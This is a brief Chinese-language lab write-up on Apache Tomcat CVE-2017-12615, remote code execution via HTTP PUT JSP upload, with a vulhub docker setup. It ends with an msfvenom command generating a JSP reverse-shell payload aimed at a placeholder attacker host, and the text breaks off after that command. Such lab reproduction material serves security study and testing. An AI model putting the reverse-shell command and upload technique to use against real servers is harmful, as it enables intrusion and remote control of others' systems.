漏洞描述
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,其中就有远程代码执行漏洞(CVE-2017-12615)。当 启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。
影响版本
Apache Tomcat 7.0.0 - 7.0.81
环境搭建
docker + vulhub
访问http://ip地址:8080
:
漏洞复现
使用msf生成shell木马:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx.xxx.xxx.xxx